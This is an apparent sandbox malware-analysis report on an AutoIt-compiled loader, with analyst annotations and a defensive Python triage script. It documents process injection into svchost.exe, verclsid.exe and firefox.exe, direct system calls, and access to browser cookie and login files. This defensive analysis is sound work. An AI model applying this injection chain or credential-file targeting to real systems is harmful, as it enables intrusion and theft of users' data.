Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03956962 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E | mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC89D | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930887 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395E8C0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A008C0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396C8F9 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA8E4 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC810 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004B0B62 | GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_00482622 | IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_0047083F | IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004709D5 | SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_00470C21 | SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
The four IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter sequences above are in the sample's own image (process 0) and match the shape of a C runtime's fatal-error and stack-cookie-failure handlers; on their own they are weak evidence of deliberate anti-debugging, unlike the fs:[30h] reads in the injected svchost.exe code.
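An added example, not part of the Joe Sandbox report, that turns fs:[30h] rows like the ones above into a per-function tally so the functions with the most PEB reads can be opened first in the process dump. It assumes the row format as extracted on this page (a "Code function: <id> mov <reg>, dword ptr fs:[<off>h]" fragment per row, with or without a column separator) and a 32-bit target, which is what fs:[30h] implies; the TEB and PEB offset tables are the documented x86 layouts. The eight sample rows are a constructed excerpt copied from the list above.

```python
"""Tally Joe Sandbox 'Code function ... mov reg, dword ptr fs:[30h]' rows per function."""
import re
from collections import Counter

# x86 TEB slots reached through fs: (NtTib at offset 0, the PEB pointer at 0x30), and
# the PEB fields the classic anti-debug checks go on to read through that pointer.
TEB_X86 = {0x00: "NtTib.ExceptionList (SEH chain)", 0x18: "NtTib.Self (TEB)",
           0x30: "ProcessEnvironmentBlock"}
PEB_X86 = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# Constructed excerpt: eight rows copied from the report (one row per read), selection
# ours. The fused "svchost.exeCode function" is how the page's table extracted.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
"""

# Accepts both the fused form above and a "<id> | mov ..." column form.
ROW = re.compile(r"Code function: (?P<fn>\d+_\d+_[0-9A-Fa-f]{8})[ |]+"
                 r"mov (?P<reg>e[a-z]{2}), dword ptr fs:\[(?P<off>[0-9A-Fa-f]+)h\]")


def fs_reads(text):
    """Yield (function id, register, fs offset) for every 'mov reg, fs:[off]' row."""
    for m in ROW.finditer(text):
        yield m["fn"], m["reg"].lower(), int(m["off"], 16)


def describe_fs_offset(off):
    """Name the TEB slot an fs:[off] read hits, if it is one of the well-known ones."""
    return TEB_X86.get(off, f"fs:[{off:#x}] (not in the TEB table above)")


def peb_reads_per_function(text):
    """function id -> Counter of registers loaded with the PEB pointer (fs:[30h] only)."""
    per_fn = {}
    for fn, reg, off in fs_reads(text):
        if off == 0x30:
            per_fn.setdefault(fn, Counter())[reg] += 1
    return per_fn


def rank_functions(text, top=None):
    """Functions ordered by PEB-read count: the ones to open first in the process dump."""
    totals = [(fn, sum(c.values())) for fn, c in peb_reads_per_function(text).items()]
    totals.sort(key=lambda t: (-t[1], t[0]))
    return totals[:top] if top else totals


if __name__ == "__main__":
    reads = peb_reads_per_function(SAMPLE_ROWS)
    for fn, n in rank_functions(SAMPLE_ROWS):
        regs = ", ".join(f"{r} x{c}" for r, c in sorted(reads[fn].items()))
        print(f"{fn}: {n} read(s) of {describe_fs_offset(0x30)} into {regs}")
    print("fields a follow-on read through that register usually targets:",
          ", ".join(f"+{o:#04x} {name}" for o, name in sorted(PEB_X86.items())))
```

Feed it the whole report text rather than the excerpt and the ranking is the triage order; the register column tells you which register to trace forward from the function start when you look for the PEB+0x02 or PEB+0x68 compare.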

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | NtCreateUserProcess: Direct from: 0x76F0371C
"Direct from" is the address the sandbox saw the system call issued from, rather than the expected ntdll entry for that Nt* function. All 34 hits, for 27 distinct functions, fall between 0x76EF63F9 and 0x76F0490C, with 32 of them packed into 0x76F02ADC to 0x76F0490C and only the second NtSetInformationThread (0x76EF63F9) and the first NtProtectVirtualMemory (0x76EF7B2E) sitting apart. One code region therefore issues them all; before treating the signature as confirmed EDR bypass, resolve that region in the dump of zalkpCfMwtnpQo.exe and check whether it lies inside the loaded ntdll image or in a private or copied region. The set of calls (allocate, protect, write and map into another process, set thread information and context, resume a thread, create a user process) is the same API surface the injection rows below show in action.
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe | Section loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: read write
Source: C:\Windows\SysWOW64\verclsid.exe | Section loaded: NULL target: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\verclsid.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe | Thread register set: target process: 7948
Source: C:\Windows\SysWOW64\verclsid.exe | Thread APC queued: target process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C74008
Read together, these rows are the injection chain behind the "maps a DLL or memory area into another process", "modifies the context of a thread in another process" and "queues an APC in another process" signatures: the sample maps an executable section into svchost.exe and writes to it at 0x2C74008; svchost.exe maps executable sections into zalkpCfMwtnpQo.exe and verclsid.exe; verclsid.exe maps into zalkpCfMwtnpQo.exe and firefox.exe, sets a thread context in process 7948 (the report gives only the PID here) and queues an APC in zalkpCfMwtnpQo.exe. The NULL in "Section loaded: NULL" is the section's file name: there is none, so each target ends up with an executable, writable region that no module on disk accounts for, which is the memory-forensics artefact to hunt for in the targets.
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004B1201 | LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_00492BA5 | SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004BB226 | SendInput, keybd_event
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004D22DA | GetForegroundWindow, GetDesktopWindow, GetWindowRect, mouse_event, GetCursorPos, mouse_event
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe | Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
The first of these three rows is the one to build a detection on: the child's image is svchost.exe but its command line is the sample's own path, which is what CreateProcess produces when lpApplicationName and lpCommandLine name different programs, and a legitimate svchost.exe is started by services.exe with a "-k <group>" argument, never by a program on the user's desktop. The third row is the second anomaly: verclsid.exe is the shell's COM class verifier and has no reason to launch a browser, and the firefox.exe it starts is the process that then receives the executable section above.
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004B0B62 | GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004B1663 | AllocateAndInitializeSid, CheckTokenMembership, FreeSid
0_2_004B0B62 (adding ACEs to a window station or desktop DACL through SetUserObjectSecurity), 0_2_004B1201 (LogonUserW through CreateProcessAsUserW) and 0_2_004B1663 (the AllocateAndInitializeSid / CheckTokenMembership admin-group test) are consistent with the RunAs and IsAdmin support built into the AutoIt interpreter that every compiled AutoIt binary carries, as are the SendInput / keybd_event and mouse_event functions; they show what the runtime can do, not what this script does, which is why the compiled-script marker below matters more than these rows.
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Shell_TrayWnd and Progman are the window classes of the taskbar and the desktop; FindWindow on either followed by GetWindowThreadProcessId yields explorer.exe's PID, which is the standard way an injector locates the shell process. The ">>>AUTOIT SCRIPT<<<" marker and the interpreter's error strings are what the "compiled AutoIt script" verdict keys on; the marker is what the interpreter uses to find the embedded script, so the script body can be recovered with a standard AutoIt decompiler and read directly instead of being inferred from the runtime's imports.
                Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: zalkpCfMwtnpQo.exe, 00000002.00000002.3549061384.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000000.1752088734.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000000.1908407918.0000000001910000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00470698 cpuid 0_2_00470698
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_004C8195
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004AD27A GetUserNameW,0_2_004AD27A
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0048BB6F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\verclsid.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\verclsid.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_81
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_XP
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 